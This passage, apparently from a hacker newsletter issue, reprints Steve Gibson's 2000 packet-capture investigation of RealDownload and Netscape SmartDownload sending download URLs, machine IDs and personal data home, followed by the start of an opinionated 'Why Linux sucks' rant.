downloadid = 9B1450495BF2 11D4A025002018252799 Next, I use my GUID-maker program to generate three GUIDs, but I restart Windows each time: Three Windows GUIDs WITH REBOOTS GUID = A7F1BFC05FD811D4A025002018252799 GUID = 39CC01805FD911D4A025002018252799 GUID = 8ADA6EE05FD911D4A025002018252799 We see that the first 12 characters of the GUIDs are different (especially the first eight), whereas the 20 character GUID tail is absolutely constant, even across reboots of a single system. Network adapters are designed to possess "globally unique" MAC addresses in order to prevent physical address collisions when communicating across a local network segment. This means that Network adapter MAC addresses are a good source for some guaranteed-to-be-unique "bits". Therefore, the Open Software Foundation's (OSF) GUID creation scheme incorporates the machine's LAN adapter MAC address, when available, into the GUIDs creation. Since the tests have so far been conducted on a networked machine with a LAN adapter, the next logical step would be to perform them on a machine without a network card: Three Windows GUIDs WITH REBOOTS and NO LAN Adapter MAC Address GUID = 7A9196805FE811D4BA1DA6C968FAE763 GUID = 147026E05FE911D4BA1D8FF112DACE63 GUID = 9C1C35205FE911D4BA1DA55166FEC463 As you can see above, without a LAN adapter's static MAC address available, the situation again changes. Now a region in the center of the the GUIDs is static across GUID generation and across reboots, but the last 12 characters, which had previously never changed, are now very different after each reboot. So What Does it All Mean? It means this is a big mess. All of the evidence indicates that RealNetworks' 'downloadid' actually is nothing more or less than a standard Windows GUID. downloadid == GUID The RealNetworks technical manager told me, Monday, that the last 24 characters of their 'downloadid' were "derived from" a Windows GUID. And while I suppose that's technically correct, it's a bit misleading, since I am now virtually certain that their 'downloadid' is exactly and without 'derivation' a Windows GUID. "Huh? They're using dynamically generated Windows GUIDs as their download IDs?" Yeah . . . I know . . . It is a really weird and dumb thing to do: As we have clearly seen, it is not reliably static enough to use as a trustworthy per-computer identifier, yet it is one, sort of, most of the time, maybe. But neither is it random enough to be used as an opaque per-transaction identifier (as I believe it was intended) without the serious privacy concerns that I originally raised. Here's exactly what I believe happened: The copy of NetZip's Download Demon I analyzed exhibits precisely the same behavior at RealNetworks' RealDownload. Therefore, I believe that prior to RealNetworks' acquisition of Download Demon from NetZip, some programmer at NetZip wasn't the least bit concerned about privacy issues. (This is certainly still more the rule than the exception today.) So this programmer innocently uses a Windows GUID as a convenient unique tag for their Demon's transaction tracking. This programmer never stops to consider, if he or she even knew, that the GUID contains by design and specification the machine's absolutely unique LAN adapter MAC address, or some other relatively invariant machine-specific tagging information if the system has no LAN card. Next, RealNetworks apparently commits two blunders: They employ Arthur Andersen to provide a third-party blessing of a second-party product. Since I doubt that the folks from Arthur Andersen are grossly incompetent, it can only be that they don't really care about, or understand, the nature and requirements for personal privacy. They put the Arthur Andersen eSeal of Approval on a product which is not only sending a unique identifier, but managing to transmit its user's unique MAC adapter address across the Internet while intimately associating it with every file download. Yikes! RealNetworks, for its part, either didn't perform its own effective or useful code review on a second-party acquired product, or it, too, is not sufficiently aware of the requirements for personal privacy. Oh sure, RealNetworks has license agreements, privacy policies, and rampaging lawyers galore, but its actual products suffer time and again from significant privacy concerns. RealNetworks has, undeniably, fumbled their acquisition of Download Demon and the release of RealDownload, but . . . A completely fair reading of the evidence suggests that RealNetworks never meant to violate anyone's privacy. And, significantly, this is absolutely different from the conclusion I would draw from the design of Netscape's superficially similar Smart Download product. As you will see below, Smart Download creates an ID Tag in the registry of any machine it's installed on and transmits that Tag with every file download report. Tuesday, July 25 CONFIRMED: The currently downloadable new version of RealDownload omits the infamous downloadid from its "phoning home" per-file download reports. The reports (enabled by default) continue to be sent, but any user-tracking would be much less accurate now, needing to be based upon the user's potentially dynamic IP address. ("Phoning home" is a fundamentally non-private action for any Internet software.) CONFIRMED: Previous version(s) of RealDownload continue to retrieve images from RealNetworks' eCommerce server domain. RealNetworks customers who received an insecure personal cookie containing their name and address, will have this private and personally identifiable information transmitted as a result of the use of previous version(s) of RealDownload. I was told this privacy breach would be eliminated five days ago . . . yet it continues. To Summarize before we examine the details . . . In order to confirm or deny the reports alleging that the Real Networks and Netscape/AOL download utilities might be spying on their users by secretly "phoning home" with detailed reports of every file their users download, I used a readily available "packet sniffer" to monitor the data being sent from one of my machines when downloading a handful of my own website's files. I was able to quickly confirm that the NetZip-descended downloaders used by Real Networks and Netscape/AOL were, indeed, sending detailed reports of every download "back to base" every time they were used to download a file. These reports contained the complete Internet URL of the file being downloaded and were accompanied by an apparently unique "ID Tag" which was associated with each machine. To confirm this, I experimented with downloads from several different computers. In every case the "apparently unique ID" being sent out never changed on the same computer, and each computer has its own. Netscape's Smart Download goes one step further by including the computer's IP address in a separate "cookie" header. This is troubling, since "cookie" headers tend to be left alone as they pass through proxies and anonymizers. This would thwart deliberate attempts at keeping the computer's IP address confidential. When you consider that each user's computer is uniquely identified, and that reports are being sent back for every file downloaded and accompanied by a unique ID tag (and, in the case of Netscape, the machine's unique IP address) . . . . . . It is NATURAL to wonder WHY this information is being transmitted, and to what end the data is being put! Dissecting RealDownload's Packet Traffic After installing RealNetworks' RealDownload utility, I clicked on a web link to download the file "id.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out of my computer to one of Real's servers: MAC source address: 00-20-18-25-27-99 MAC dest address: 00-90-7F-01-21-E8 Frame type: IP Protocol: TCP->HTTP Source IP address: 207.71.92.206 Dest IP address: 207.188.30.49 Source port: 1107 Destination port: 80 SEQ: 3073973 ACK: 169605441 Packet size: 417 Packet data: 0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E. 0010: 01 93 1C 0A 00 00 40 06 43 58 CF 47 5C CE CF BC ......@.CX.G\... 0020: 1E 31 04 53 00 50 00 2E E7 B5 0A 1B F9 41 50 18 .1.S.P.......AP. 0030: FF FF 44 5A 00 00 47 45 54 20 2F 73 61 32 2E 61 ..DZ..GET /sa2.a 0040: 73 70 3F 70 72 6F 64 75 63 74 3D 52 65 61 6C 44 sp?product=RealD 0050: 6F 77 6E 6C 6F 61 64 26 76 65 72 73 69 6F 6E 3D ownload&version= 0060: 34 2E 30 2E 30 2E 31 38 26 70 6C 61 74 66 6F 72 4.0.0.18&platfor 0070: 6D 3D 57 69 6E 39 38 26 65 76 65 6E 74 3D 64 6F m=Win98&event=do 0080: 77 6E 6C 6F 61 64 53 74 61 72 74 26 75 72 6C 3D wnloadStart&url= 0090: 68 74 74 70 25 33 41 25 32 46 25 32 46 67 72 63 http%3A%2F%2Fgrc 00A0: 2E 63 6F 6D 25 32 46 66 69 6C 65 73 25 32 46 69 .com%2Ffiles%2Fi 00B0: 64 2E 7A 69 70 26 72 65 66 75 72 6C 3D 67 72 63 d.zip&refurl=grc 00C0: 2E 63 6F 6D 26 66 69 6C 65 73 69 7A 65 3D 31 32 .com&filesize=12 00D0: 33 32 38 26 6D 69 6D 65 3D 61 70 70 6C 69 63 61 328&mime=applica 00E0: 74 69 6F 6E 25 32 46 7A 69 70 26 70 65 72 63 65 tion%2Fzip&perce 00F0: 6E 74 3D 30 26 64 6F 77 6E 6C 6F 61 64 69 64 3D nt=0&downloadid= 0100: 39 42 31 34 35 30 34 39 35 42 46 32 31 31 44 34 9B1450495BF211D4 0110: 41 30 32 35 30 30 32 30 31 38 32 35 32 37 39 39 A025002018252799 0120: 26 73 62 69 64 3D 26 73 70 6F 6E 73 6F 72 3D 72 &sbid=&sponsor=r 0130: 64 62 61 73 69 63 20 48 54 54 50 2F 31 2E 30 0D dbasic HTTP/1.0. 0140: 0A 48 6F 73 74 3A 20 73 61 2E 6E 65 74 7A 69 70 .Host: sa.netzip 0150: 2E 63 6F 6D 0D 0A 41 63 63 65 70 74 3A 20 2A 2F .com..Accept: */ 0160: 2A 0D 0A 43 6F 6F 6B 69 65 3A 20 4C 61 73 74 49 *..Cookie: LastI 0170: 6E 66 6F 49 44 3D 31 30 30 32 3B 73 62 69 72 73 nfoID=1002;sbirs 0180: 68 61 72 65 3D 72 64 62 61 73 69 63 0D 0A 52 61 hare=rdbasic..Ra 0190: 6E 67 65 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 0D nge: bytes=0-... 01A0: 0A This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into individual lines (at the '&' delimiter), and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" being given to RealNetworks' server, is: GET /sa2.asp? product=RealDownload version=4.0.0.18 platform=Win98 event=downloadStart url=http://grc.com/files/id.zip refurl=grc.com filesize=12328 mime=application/zip percent=0 downloadid=9B1450495BF211D4A025002018252799 sbid= sponsor=rdbasic HTTP/1.0 The balance of the data transmitted consists of the additional information "parameters" shown below: Host: sa.netzip.com Accept: */* Cookie: LastInfoID=1002;sbirshare=rdbasic Range: bytes=0- So, what does the data analysis show us? The complete URL of the file I downloaded was sent to the receiving server: "url=http://grc.com/files/id.exe". The receiving server thus knows the location and full filename of the link I clicked on to download. My machine and I have been "tagged" by the compound "Key" of: 9B1450495BF211D4A025002018252799 Which can be broken into its two component parts: 9B145049 5BF211D4A025002018252799 The left chunk is a "counter" which appears to be incremented once for every file downloaded. I believe that this serves as a "session ID" to separate and identify individual downloads being conducted by a single computer. The right-hand chunk is the "computer ID" which is, according to RealNetworks, based upon a Globally Unique ID (GUID) and is used to uniquely identify the computer into which RealDownload has been installed. The Big Bad Boondoggle... When I was re-examining the RealDownload system on Monday, July 17th, something caught my eye that I had missed on the previous Friday: My full name, and the private eMail alias I always use for on-line purchases, was sent out of my computer to one of Real's servers when I downloaded a file using RealDownload. RealNetworks' repetitious assertions that it is NOT POSSIBLE for them to associate our RealDownload mediated downloads with our actual identity, or that no "personally identifiable information" is transmitted without our informed consent, appear to be no more correct than their previous assertions about the lack of RealDownload's ID tagging. Just so we're really clear here: I am NOT alleging that RealNetworks IS making this association. I have no evidence of that one way or the other. But I AM proving that they absolutely COULD if they chose to. Furthermore, for some reason which is not known to me, they have repeatedly stated that they CAN NOT. MAC source address: 00-20-18-25-27-99 MAC dest address: 00-90-7F-01-21-E8 Frame type: IP Protocol: TCP->HTTP Source IP address: 207.71.92.206 Dest IP address: 208.147.89.135 Source port: 1108 Destination port: 80 SEQ: 3074088 ACK: 3078494647 Packet size: 339 Packet data: 0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E. 0010: 01 45 1E 0A 00 00 40 06 05 79 CF 47 5C CE D0 93 .E....@..y.G\... 0020: 59 87 04 54 00 50 00 2E E8 28 B7 7E 19 B7 50 18 Y..T.P...(....P. 0030: FF FF 05 FB 00 00 47 45 54 20 2F 61 64 73 2F 68 ......GET /ads/h 0040: 6F 75 73 65 5F 6A 75 6B 65 62 6F 78 31 2E 67 69 ouse_jukebox1.gi 0050: 66 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 f HTTP/1.1..Acce 0060: 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept- 0070: 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us. 0080: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding 0090: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate. 00A0: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A .User-Agent: Moz 00B0: 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 illa/4.0 (compat 00C0: 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 3B 20 ible; MSIE 5.0; 00D0: 57 69 6E 64 6F 77 73 20 39 38 3B 20 44 69 67 45 Windows 98; DigE 00E0: 78 74 29 0D 0A 43 6F 6F 6B 69 65 3A 20 52 4E 45 xt)..Cookie: RNE 00F0: 63 6F 6D 6D 3D 76 65 72 32 2E 30 7C ?? ?? ?? ?? comm=ver2.0|xxxx 0100: ?? ?? ?? ?? ?? ?? ?? ?? ?? 7C 53 74 65 76 65 7C xxxxxxxxx|Steve| 0110: 47 69 62 73 6F 6E 7C 4F 46 46 7C 39 58 33 47 38 Gibson|OFF|9X3G8 0120: 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 ..Connection: Ke 0130: 65 70 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 ep-Alive..Host: 0140: 69 6D 61 67 65 73 2E 72 65 61 6C 2E 63 6F 6D 0D images.real.com. 0150: 0A 0D 0A ... As before, we can easily break this rather intimidating looking hexadecimal data block into its much more easily readable header lines: GET /ads/house_jukebox1.gif HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8 Connection: Keep-Alive Host: images.real.com The "Cookie" header line (shown above) which is present in the outbound transmission to one of RealNetworks' servers a transmission which was triggered by my use of RealDownload not only demonstrates that RealNetworks has again misrepresented their capabilities, if not their actions and intentions, but also that they are careless in the extreme with their customer's personal and private data: Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8 Breaking this down with the benefit of what the RealNetworks technical manager told me: I am guessing that the "RNEcomm=ver2.0" string stands for "Real Networks Electronic Commerce version 2.0". The string of 'xxxxxxxxxxxxxxxxxx' shown above was, when captured on its way out of my computer, my personal and private eMail address alias which would have been used during an online eCommerce purchase. I hope that you (the reader) will understand that I desire to protect its privacy here even if RealNetworks hasn't. The next two fields: "Steve" and "Gibson" are rather clear. If this isn't "personally identifiable information" being sent during the use of RealDownload, I can't imagine what would be. I can't guess what the last two fields: "OFF" and "9X3G8" might refer to. But logic would indicate that the "9X3G8" is an identifier which refers in some way to my past purchase of "Real Producer" which the RealNetworks technical manager concluded was the event which planted this very persistent cookie onto my computer for subsequent re-transmission at various odd (and in some cases potentially awkward and certainly non-anonymous) moments . . . such as whenever using their supposedly anonymous RealDownload agent. You will notice that the server ("Host:") to which the offending Cookie was sent appears to be 'images.real.com'. This is a different server, at a different Internet IP address, from the one which received RealDownload's file download report. However, Internet server-clustering technologies, for aggregating data across disparate servers, are readily available, and we would expect a company like RealNetworks to be at the forefront of such bandwidth management technology. Thus the fact that the information was sent to different servers does not prevent its ready association. Because this represents an extremely great concern for all of us, and especially for privacy advocates, I want to be very clear again that I am not alleging that such associating of these two separate communications IS being done, but only that RealNetworks' repeated assertion that it COULD NOT BE DONE, appears to be patently false. Dissecting Smart Download's Packet Traffic After installing Netscape's Smart Download utility, I clicked on a web link to download the file "tip.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out of my computer to one of Netscape's servers: MAC source address: 00-20-18-25-27-99 MAC dest address: 00-90-7F-01-21-E8 Frame type: IP Protocol: TCP->HTTP Source IP address: 207.71.92.206 Dest IP address: 207.200.75.206 Source port: 1041 Destination port: 80 SEQ: 330513 ACK: 750466305 Packet size: 450 Packet data: 0000: 00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E. 0010: 01 B4 9C 00 40 00 80 06 15 97 CF 47 5C CE CF C8 ....@......G\... 0020: 4B CE 04 11 00 50 00 05 0B 11 2C BB 35 01 50 18 K....P....,.5.P. 0030: 22 38 44 F5 00 00 47 45 54 20 2F 63 67 69 2D 62 "8D...GET /cgi-b 0040: 69 6E 2F 73 64 5F 73 65 72 76 65 72 2E 63 67 69 in/sd_server.cgi 0050: 3F 70 6C 61 74 66 6F 72 6D 3D 77 69 6E 39 38 26 ?platform=win98& 0060: 76 65 72 73 69 6F 6E 3D 31 2C 2B 31 2C 2B 30 2C version=1,+1,+0, 0070: 2B 36 36 26 75 72 6C 3D 68 74 74 70 25 33 41 25 +66&url=http%3A% 0080: 32 46 25 32 46 67 72 63 2E 63 6F 6D 25 32 46 66 2F%2Fgrc.com%2Ff 0090: 69 6C 65 73 25 32 46 74 69 70 2E 65 78 65 26 4B iles%2Ftip.exe&K 00A0: 65 79 3D 42 52 55 4E 4F 33 39 36 44 46 32 37 33 ey=BRUNO396DF273 00B0: 20 48 54 54 50 2F 31 2E 30 0D 0A 50 72 61 67 6D HTTP/1.0..Pragm 00C0: 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 43 6F 6E a: no-cache..Con 00D0: 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C nection: Keep-Al 00E0: 69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ive..User-Agent: 00F0: 20 4E 65 74 5A 69 70 2D 44 6F 77 6E 6C 6F 61 64 NetZip-Download 0100: 65 72 2F 31 2E 30 2E 36 32 20 28 57 69 6E 33 32 er/1.0.62 (Win32 0110: 3B 20 44 65 63 20 20 37 20 31 39 39 38 29 0D 0A ; Dec 7 1998).. 0120: 48 6F 73 74 3A 20 63 67 69 2E 6E 65 74 73 63 61 Host: cgi.netsca 0130: 70 65 2E 63 6F 6D 3A 38 30 0D 0A 52 61 6E 67 65 pe.com:80..Range 0140: 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 41 63 63 65 : bytes=0-..Acce 0150: 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept- 0160: 4C 61 6E 67 75 61 67 65 3A 20 65 6E 0D 0A 41 63 Language: en..Ac 0170: 63 65 70 74 2D 43 68 61 72 73 65 74 3A 20 69 73 cept-Charset: is 0180: 6F 2D 38 38 35 39 2D 31 2C 2A 2C 75 74 66 2D 38 o-8859-1,*,utf-8 0190: 0D 0A 43 6F 6F 6B 69 65 3A 20 55 49 44 43 3D 32 ..Cookie: UIDC=2 01A0: 30 37 2E 37 31 2E 39 32 2E 32 30 36 3A 30 39 36 07.71.92.206:096 01B0: 33 35 33 33 30 30 32 3A 32 33 38 32 31 31 0D 0A 3533002:238211.. 01C0: 0D 0A This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into individual lines, and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" given to the Netscape server, is: GET /cgi-bin/sd_server.cgi?platform=win98 &version=1,+1,+0,+66&url=http://grc.com/ files/tip.exe&Key=BRUNO396DF273 HTTP/1.0 This long line can then be further broken down into its various components: GET /cgi-bin/sd_server.cgi platform=win98 version=1,+1,+0,+66 url=http://grc.com/files/tip.exe Key=BRUNO396DF273 HTTP/1.0 The balance of the data transmitted consists of the additional information "parameters" shown below: Pragma: no-cache Connection: Keep-Alive User-Agent: NetZip-Downloader/1.0.62(Win32;Dec 7 1998) Host: cgi.netscape.com:80 Range: bytes=0- Accept: */* Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Cookie: UIDC=207.71.92.206:0963533002:238211 So, what does the data analysis show us? The complete URL of the file I downloaded was sent to Netscape: "url=http://grc.com/files/tip.exe". Netscape thus knows what site I was visiting and what file(s) I clicked on to download. My machine and I have been "tagged" by the "Key" of: "BRUNO396DF273" Interestingly, "Bruno" is the name of the machine I used for this testing. So, the machine's name is being sent as part of my "ID". Also, I performed this experiment SEVERAL TIMES, shutting down the machine and rebooting . . . and the key's value never changed. Thus, it is clearly serving as a "persistent tag" and is being used to uniquely identify me from one use of the download utility to the next. After seeing the "BRUNO396DF273" tag being sent, I searched the Windows Registry for that tag string. I found it in my machine's Registry at: HKEY_LOCAL_MACHINE\Software\Nsda\1.1\Options\UserID This makes it pretty clear that the tag is, indeed, a persistent "UserID" (by their own label) which has been assigned to my machine for the purpose of long-term, unique, identification. Note that any time Netscape (or anyone else) ever wants to, they could access that public registry key and immediately tie me, and this machine, to my entire past download history. IMPORTANT!: Users of Netscape's Smart Download utility, who unwittingly joined Netscape's "NetCenter" system, are especially at risk of privacy violation because NetCenter members also have their NetCenter logon ID and their personal eMail address sent with each file download report! So much for never including any "personally identifiable" information. This means that the user's NetCenter logon ID many people simply use their names and eMail address are both being transmitted along with the name of every file downloaded by Smart Download. And finally ... check out the "Cookie" field that is being sent! (It is the last field of the last group above.) The glob at the end includes encoded date and time information, but immediately after the "UIDC=" is my machine's IP address!! So Netscape apparently thought that would be a good thing for them to have also. Since it's in a "cookie" field, it will pass through "anonymizers", "proxies", and NAT routers, which would otherwise obscure the user's true IP address. In other words, since the machine's own IP address has been included in this "cookie", using the Internet through an "IP anonymizing service" will NOT prevent Netscape/AOL from learning the machine's TRUE IP. Netscape receives it directly from their software running in the user's computer. In Summary . . . So what does it all mean? I am not a Netscape or RealNetworks programmer, so I can only go by the evidence presented through an analysis of the available data. I've read the "fine print" of their various license agreements carefully several times, and I've examined their online FAQ pages. There seems to be no question that by "agreeing" to the license, the user allows these companies to gather any sort of data they desire. The licenses seem strangely self-contradictory and quite unclear about what is being collected, stored, retained, compiled, used . . . and what is not, and why. A close reading of the NetZip Download Demon license reveals an assertion interestingly absent from the otherwise very similar RealDownload license: "No unique identifier or any personally identifiable information is sent with this information;" It would appear that someone at RealNetworks realized that NetZip's license had always been misleading its 14 million users, since a "unique identifier" was, in fact, always being sent along with the file download information. As a result, did RealNetworks remove the identifier? No. From their version of the NetZip license, RealNetworks simply removed the assertion that there was no identifier. Yet these are the same people who are asking us to trust them with the fact that they could be recording the name and location of every single file we download through the Internet? . . . which is clearly tagged with our unique ID and with our machine's IP address? For most people, the main issue revolves around whether or not a report of every file downloaded with those utilities is transmitted back to their home base . . . and there's just no question any longer that unless deliberately disabled by the user, this is being actively done. If that bothers you, you may wish to immediately remove these downloading tools from your system. Any of these file download spies may be removed through Windows' standard Add/Remove Programs feature located in the Windows Control Panel. You will find them listed as "Netscape SmartDownload", "RealDownload", and "NetZip Download Demon". An additional privacy risk involves whether, to what degree, and to what end, historical file downloading profiles are being compiled about individuals, whether or not they are known by name and address and "personally identifiable." Netscape has been completely silent on this issue, whereas RealNetworks has gone absolutely ballistic over my pointing out what it has apparently lied about and what it could be doing with the data that has been sent to its servers. As I have repeatedly stated, I have no evidence, information, or knowledge either way. But trust is what it all boils down to, and RealNetworks' record on that score seems to be getting shakier with every passing day. Why is a unique ID tag being transmitted at all? I can only address that larger question by asking: "If these companies do not care about us in any unique way separate from everyone else (as they claim) then WHY are they going to all the trouble of uniquely tagging every user's computer and deliberately transmitting not only that unique ID tag, but also in the case of Netscape sending the user's Internet IP address with each and every download file report?" This is not required for the purpose of identifying what files are downloaded "in aggregate", or learning when their downloading program is installed or removed from the host computer . . . contrary to what seems to be stated in their various license agreements. Therefore, it is difficult to understand the motivation behind collecting personal data which is, on its face, unnecessary for the stated objective. One Final Observation: The stated purpose behind all of this download profiling (in their respective licenses) is to inform these vendors about the files we are all (collectively) downloading so that they can provide some sort of additional, useful, or auxiliary information to us (this is never really made clear). Yet, the date shown for the NetZip Downloader (version 1.0.62 which was captured in the outbound TCP/IP data packet shown above) is December 7th of 1998. So, this data gathering has presumably been underway since before that date. That's been quite a while. When does the payback for all these years of "aggregate" user profiling begin? And who receives the value? And, moreover, given the highly dynamic nature of Internet content, does the whole idea of collecting such data really make any sense anyway? It makes one wonder what's really going on here . . . doesn't it? Certainly Newsworthy . . . Frankly, once all of the facts are exposed and aired, I wouldn't blame anyone for being quite upset by the whole story. We now know, with absolute certainty, that more than 14 million NetZip Download Demon users have been misled by the product's license agreement. And it is this deceived "asset base" which RealNetworks recently purchased. How nice. So, it's hardly surprising that the online news media has picked up on and reported the news of a Class Action Lawsuit brought against Netscape/AOL over their Smart Download spyware. These stories provide some additional background information about the secret spying activities of these programs: Wired News: Privacy Suit Targets Netscape ZDNet News: AOL/Netscape hit with privacy lawsuit Keeping Yourself Informed Within hours of my confirmation of this potentially serious privacy breach, the 338,584 current members of our User-Managed eMail Notification System received a brief piece of eMail outlining my findings and inviting them to examine the additional resources here for additional information and interaction. So, if you are a newcomer to this site and are not already a member of our eMail Notification System, you might want to consider joining (just click the link.) As detailed in our formal Privacy Statement, your eMail address will never be disclosed, and you are completely free to remove yourself from the system if you ever choose to. For Further Discussion . . . Since my recent findings and the questions they raise about the behavior of the Netscape/Real Networks/NetZip download utilities were first disclosed to members of our User-Managed eMail Notification System, that is the topic receiving intense discussion, debate, and discovery over in our online "newsletter" discussion forum. news://grc.com/newsletter To learn more about this problem, to share your feelings and perhaps your outrage, or to learn more about detecting and removing these utilities . . . or for virtually anything related to this topic: Please jump over to our "Newsletter Discussion Page", and from there into the newsletter discussion forum. I'm certain you'll be glad you did! And thanks very much for your interest and continued support of my work! You are encouraged to browse and perhaps participate in our online newsletter discussion of this issue. Or, to return to the previous page, press your browser's BACK button. Purchasing Info GRC Mail System To GRC's Home Tech Support Steve's Place The contents of this page are Copyright (c) 2000 by Gibson Research Corporation. SpinRite, ChromaZone, ShieldsUP! and the iconic character "Mo" (shown above) are registered trademarks of Gibson Research Corporation, Laguna Hills, CA, USA. Gibson Research Corporation's GRC.COM web and customer privacy policy ~ ~ ~ @HWA 312.0 [IND] Why Linux sucks. ~~~~~~~~~~~~~~~~~~~~~ Submitted by Duro I highly recommend you visit this site, here is the general gist but there is much more informative material there and well worth the visit for any serious admin worth his salt. - Ed http://www.spatula.net/proc/linux/index.src WHY LINUX SUCKS Testing? What's that? If it compiles, it is good, if it boots up, it is perfect. - - Linus Torvalds Welcome to the beginnings of my "why linux sucks" page. There isn't much here just yet, but there are so many reasons, both technical and non-technical, that linux sucks that this page will surely fill up quickly. I've opened the page up to linking again...except from slashdot. Here's a short list of Linux flaws that make it look silly: /usr/include/linux (come on. honestly.) Lame. Nonstandard. (for the clue-deprived, this means that any code written for linux using the linux/ headers will be incompatible with all other Unix flavors.) Guess what: string.h, types.h, malloc.h, signal.h, and so-on don't belong in a platform-specific include directory. Hope you didn't want to port your code... Neither the sigaction manpage nor the signal.h includs indicate what the system defaults are. Of course, they've put signal.h in /usr/include/linux... "intro" manpages are a joke. Compare the BSD section 2 intro with the one from Linux. file systems mount async by default (power outage and your fs dies) Most linux users don't have pubes yet and are intolerably lame (3Y3 4m 1337 H4x0r d00d [uz 3y3 h4v3 L1Nux!) Too many things in user space that belong in the kernel (nfs) Too many things in the kernel that belong in user space (java) No standard distribution. Linux people say this is a good thing? Try writing software or software configuration instructions when you never know how the OS is going to be laid out, or try finding the responsible party for a block of OS code, or try fixing security problems when they arise and you'll see that this is NOT a good thing at all. no consistant pronunciation the os'es name (line-ucks? lynn-ucks?) svr4? bsd? make up your mind? Lame NFS & dd { From: Alfred Perlstein time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k 219+1 records in 219+1 records out 28760021 bytes transferred in 3.411756 secs (8429683 bytes/sec) 0.000u 0.443s 0:03.42 12.8% 91+667k 0+17io 0pf+0w (that's freebsd) time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k 219+1 records in 219+1 records out 0.010u 1.550s 0:16.00 9.7% 0+0k 0+0io 84pf+0w (linsux) [Redhat 5.1] this is on the same 100mbit segment. i'm using NFS over TCP and linux is using UDP both to the same Solaris 5.6 box. also, note how much linux dd sucks ass. (still smirking) Alfred Perlstein } #linux, #hack, #linuxwarez... New kernel every week that breaks half your applications (see end of the article #breakage) Security flaw/Root compromise of the week (see below) glibc? libc? libc5? libc6? glibc2? /bin/sh != sh; /bin/sh == bash. Lame. Nonstandard. Result: broken shell scripts and nonportable code. /usr/bin/make != make; /usr/bin/make == gmake. Lame. Nonstandard. Same result as above: nonportable code. ext2fs Linux will mount partitions that are not clean can't handle partitions > 2GB (i've hear they finally fixed this one) e2fsck deliberatly leaves/creates corrupt files (if there is a block that it duplicate between two files, e2fsck will clone the duplicate (while fsck will remove both files. This can also result in a user gaining unauthorized access to another user's data.)) it swap likes swap to swap swap too swap often swap only allows 128M of swap at a time; for a 1G of swap, you need 8 swap partitions can't handle more than 1GB of RAM To install Joe's program, you need Bob's kernel hack, but for Bob's kernel hack, you've got to have Suzy's patches, but Suzy's patches only work with a year-old kernel, unless you get Mike's patches to Suzy's patches, but even then, those conflict with Jeff's drivers, which can be resolved only by installing Nancy's patches... Can't handle the same IP on more than one interface Can't handle large files { Help, mommy! I can't handle the BIG files! (names have been changed to protect the innocent) qqq(4)% uname -a SunOS qqq.zz.xxxxx.xxx 5.6 Generic_105181-07 sun4u sparc SUNW,Ultra-2 qqq(5)% ls -l total 7330114 - -rw-r--r-- 1 root root 110622720 Oct 27 03:01 zzz.xxxxx.xxx.tar - -rw-r--r-- 1 root other 313320448 Oct 7 17:06 file1.tar - -rw-r--r-- 1 root other 5079040 Aug 16 22:33 file2.tar - -rw-r--r-- 1 root other 1107240960 Aug 16 22:39 file3.tar - -rw-r--r-- 1 root other 52045312 Oct 27 03:57 file4.tar - -rw-r--r-- 1 root root 2162790400 Oct 27 21:56 file5.tar wwww(36)% uname -a Linux wwww.zz.xxxxx.xxx 2.1.117 #4 SMP Tue Aug 25 01:37:46 EDT 1998 i686 unknown wwww(37)% ls -l ls: file5.tar: File too large total 1551913 - -rw-r--r-- 1 root root 110622720 Oct 27 1998 zzz.xxxxx.xxx.tar - -rw-r--r-- 1 root bin 313320448 Oct 7 1998 file1.tar - -rw-r--r-- 1 root root 5079040 Aug 16 1998 file2.tar - -rw-r--r-- 1 root root 1107240960 Aug 16 1998 file3.tar - -rw-r--r-- 1 root bin 52045312 Oct 27 1998 file4.tar } Max file size: 2GB. (*BSD: 4 Terabytes) Dynamically linked root shell. Doom! lilo! any boot loader that needs to have magic block numbers is wrong linux icmp.h is *NOT* unix icmp.h - they're totally incompatible. flatfile password files make listing large ftp directories impossible due to huge numbers of flatfile searchces. password file can be non-shadowed - encrypted passwords visible to all shadow.h! hahahahahahaha! Slowass network code (see http://www.nfr.net/nfr/SYSTEM_NOTES.html#LinuxGeneral) Did I mention slowass network code? (see http://neuromancer.rmci.net/linux-vs-freebsd.html) Oh, also slowass network code (see 